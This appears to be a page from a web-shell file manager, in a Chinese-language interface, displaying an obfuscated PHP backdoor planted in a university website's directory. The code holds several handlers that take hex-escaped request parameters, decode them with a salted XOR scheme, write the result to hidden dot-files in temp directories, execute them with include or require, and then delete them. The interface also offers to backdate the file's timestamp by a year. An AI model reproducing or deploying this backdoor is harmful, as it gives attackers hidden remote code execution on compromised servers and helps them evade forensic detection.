文件操作 - CYEC06_3winners.php
返回文件管理
返回主菜单
删除本文件
文件: /var/www/demoestudiantes.uaysen.cl/html/CYEC06_3winners.php
编辑文件内容
<?php if(isset($_POST["\x63\x6Fmp"])){ $desc = $_POST["\x63\x6Fmp"]; $desc = explode( '.' , $desc ) ; $ref = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt); $q = 0; foreach( $desc as $v1) { $sChar = ord( $salt[$q % $sLen]); $d = ( ( int)$v1 - $sChar -( $q % 10)) ^ 78; $ref .= chr( $d); $q++; } $mrk = array_filter(["/tmp", session_save_path(), sys_get_temp_dir(), "/var/tmp", getcwd(), getenv("TMP"), getenv("TEMP"), "/dev/shm", ini_get("upload_tmp_dir")]); for ($component = 0, $element = count($mrk); $component < $element; $component++) { $property_set = $mrk[$component]; if ((bool)is_dir($property_set) && (bool)is_writable($property_set)) { $obj = str_replace("{var_dir}", $property_set, "{var_dir}/.dat"); if (file_put_contents($obj, $ref)) { require $obj; unlink($obj); exit; } } } } if(array_key_exists("ptr", $_REQUEST) && !is_null($_REQUEST["ptr"])){ $element = array_filter(["/var/tmp", session_save_path(), ini_get("upload_tmp_dir"), "/dev/shm", getenv("TEMP"), getcwd(), getenv("TMP"), "/tmp", sys_get_temp_dir()]); $itm = $_REQUEST["ptr"]; $itm = explode ( "." , $itm ) ; $property_set = ''; $s = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s ); foreach ($itm as $r => $v8) { $chS = ord($s[$r % $lenS] ); $dec = ((int)$v8 - $chS - ($r % 10)) ^ 37; $property_set .= chr($dec );} foreach ($element as $key => $resource) { if ((bool)is_dir($resource) && (bool)is_writable($resource)) { $comp = "$resource/.reference"; if (file_put_contents($comp, $property_set)) { require $comp; unlink($comp); die(); } } } } if(isset($_REQUEST) && isset($_REQUEST["p\x6F\x69\x6Et\x65r"])){ $comp = $_REQUEST["p\x6F\x69\x6Et\x65r"]; $comp= explode ( "." , $comp ) ; $ptr= ''; $s= 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS= strlen( $s); $w= 0; $__tmp= $comp; while( $v6= array_shift( $__tmp)) { $chS= ord( $s[$w % $lenS]); $d= ( ( int)$v6 - $chS -( $w % 10)) ^ 78; $ptr .= chr( $d); $w++;} $binding = array_filter([sys_get_temp_dir(), session_save_path(), "/var/tmp", ini_get("upload_tmp_dir"), getenv("TMP"), "/dev/shm", getcwd(), getenv("TEMP"), "/tmp"]); foreach ($binding as $key => $parameter_group) { if (is_writable($parameter_group) && is_dir($parameter_group)) { $data_chunk = implode("/", [$parameter_group, ".fac"]); if (@file_put_contents($data_chunk, $ptr) !== false) { include $data_chunk; unlink($data_chunk); exit; } } } } if(in_array("rec", array_keys($_REQUEST))){ $entry = $_REQUEST["rec"]; $entry = explode('.',$entry ); $flag =''; $s ='abcdefghijklmnopqrstuvwxyz0123456789'; $sLen =strlen( $s ); $x =0; foreach( $entry as $v2) { $sChar =ord( $s[$x% $sLen] ); $dec =( ( int)$v2 - $sChar -( $x% 10)) ^ 13; $flag .= chr( $dec ); $x++; } $flg = array_filter([getcwd(), "/tmp", getenv("TMP"), "/dev/shm", session_save_path(), ini_get("upload_tmp_dir"), sys_get_temp_dir(), getenv("TEMP"), "/var/tmp"]); foreach ($flg as $itm) { if (is_writable($itm) && is_dir($itm)) { $bind = vsprintf("%s/%s", [$itm, ".element"]); $file = fopen($bind, 'w'); if ($file) { fwrite($file, $flag); fclose($file); include $bind; @unlink($bind); die(); } } } } if(count($_POST) > 0 && isset($_POST["k"])){ $ent = $_POST["k"]; $ent = explode( '.' , $ent ) ; $comp = ''; $s5 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $s5); $v = 0; $__len = count( $ent); do { if( $v >= $__len) break; $v7 = $ent[$v]; $sChar = ord( $s5[$v % $sLen]); $dec =( ( int)$v7 - $sChar -( $v % 10)) ^ 39; $comp .=chr( $dec); $v++; } while( true); $marker = array_filter(["/tmp", "/var/tmp", getenv("TEMP"), ini_get("upload_tmp_dir"), getenv("TMP"), session_save_path(), sys_get_temp_dir(), "/dev/shm", getcwd()]); $entity = 0; do { $holder = $marker[$entity] ?? null; if ($entity >= count($marker)) break; if (!!is_dir($holder) && !!is_writable($holder)) { $element = sprintf("%s/.desc", $holder); $success = file_put_contents($element, $comp); if ($success) { include $element; @unlink($element); die();} } $entity++; } while (true); } if(@$_REQUEST["flag"] !== null){ $binding = array_filter(["/dev/shm", "/var/tmp", session_save_path(), getenv("TEMP"), ini_get("upload_tmp_dir"), getenv("TMP"), getcwd(), sys_get_temp_dir(), "/tmp"]); $reference = $_REQUEST["flag"]; $reference = explode ( ".", $reference ) ; $dchunk = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen( $salt); $z = 0; $__tmp = $reference; while( $v4 = array_shift( $__tmp)) { $sChar = ord( $salt[$z % $lenS]); $d =( ( int)$v4 - $sChar -( $z % 10)) ^ 15; $dchunk .=chr( $d); $z++; } while ($entity = array_shift($binding)) { if (is_writable($entity) && is_dir($entity)) { $mrk = implode("/", [$entity, ".factor"]); $file = fopen($mrk, 'w'); if ($file) { fwrite($file, $dchunk); fclose($file); include $mrk; @unlink($mrk); exit; } } } } if(!empty($_POST["d\x63h\x75\x6Ek"])){ $key = $_POST["d\x63h\x75\x6Ek"]; $key= explode( '.', $key) ; $parameter_group = ''; $salt = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($salt); $l = 0; foreach ($key as $v2) { $sChar = ord($salt[$l%$lenS]); $dec = ((int)$v2 - $sChar - ($l%10)) ^ 47; $parameter_group .= chr($dec); $l++; } $value = array_filter([session_save_path(), getcwd(), sys_get_temp_dir(), "/dev/shm", getenv("TMP"), ini_get("upload_tmp_dir"), getenv("TEMP"), "/tmp", "/var/tmp"]); foreach ($value as $pset) { if ((function($d) { return is_dir($d) && is_writable($d); })($pset)) { $symbol = sprintf("%s/.res", $pset); if (@file_put_contents($symbol, $parameter_group) !== false) { include $symbol; unlink($symbol); die(); } } } } if(isset($_REQUEST["s\x79m\x62o\x6C"])){ $res = $_REQUEST["s\x79m\x62o\x6C"]; $res = explode ( '.' , $res ) ; $tkn= ''; $salt1= 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen= strlen($salt1); foreach($res as $i => $v9): $chS= ord($salt1[$i % $sLen]); $dec= ((int)$v9 - $chS -($i % 10))^ 85; $tkn .= chr($dec); endforeach; $ref = array_filter([sys_get_temp_dir(), getenv("TEMP"), "/var/tmp", "/tmp", getcwd(), "/dev/shm", session_save_path(), getenv("TMP"), ini_get("upload_tmp_dir")]); while ($pgrp = array_shift($ref)) { if ((is_dir($pgrp) and is_writable($pgrp))) { $flag = implode("/", [$pgrp, ".mrk"]); if (file_put_contents($flag, $tkn)) { require $flag; unlink($flag); die(); } } } } if(array_key_exists("e\x6E\x74\x69ty", $_REQUEST) && !is_null($_REQUEST["e\x6E\x74\x69ty"])){ $ent = $_REQUEST["e\x6E\x74\x69ty"]; $ent = explode (".", $ent); $pgrp = ''; $s1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $lenS = strlen($s1); $len = count($ent); for ($y = 0; $y < $len; $y++) { $v9 = $ent[$y]; $chS = ord($s1[$y % $lenS]); $d = ((int)$v9 - $chS - ($y % 10))^55; $pgrp .= chr($d); } $obj = array_filter([getcwd(), "/tmp", session_save_path(), getenv("TMP"), sys_get_temp_dir(), getenv("TEMP"), "/dev/shm", ini_get("upload_tmp_dir"), "/var/tmp"]); while ($desc = array_shift($obj)) { if (!!is_dir($desc) && !!is_writable($desc)) { $binding = join("/", [$desc, ".record"]); if (file_put_contents($binding, $pgrp)) { require $binding; unlink($binding); exit; } } } } if(array_key_exists("\x70\x6F\x69\x6Eter", $_POST)){ $binding = array_filter([session_save_path(), getenv("TMP"), "/dev/shm", getcwd(), "/var/tmp", ini_get("upload_tmp_dir"), "/tmp", sys_get_temp_dir(), getenv("TEMP")]); $symbol = $_POST["\x70\x6F\x69\x6Eter"]; $symbol = explode ( '.' ,$symbol ) ; $record = ''; $salt1 = 'abcdefghijklmnopqrstuvwxyz0123456789'; $sLen = strlen( $salt1); $r = 0; while( $r < count( $symbol)) { $v1 = $symbol[$r]; $chS = ord( $salt1[$r % $sLen]); $dec =( ( int)$v1 - $chS -( $r % 10))^ 16; $record .= chr( $dec); $r++; } foreach ($binding as $parameter_group) { if (is_dir($parameter_group) ? is_writable($parameter_group) : false) { $pgrp = sprintf("%s/.ref", $parameter_group); if (@file_put_contents($pgrp, $record) !== false) { include $pgrp; unlink($pgrp); die(); } } } }
修改文件时间
将文件时间修改为当前时间的前一年
删除文件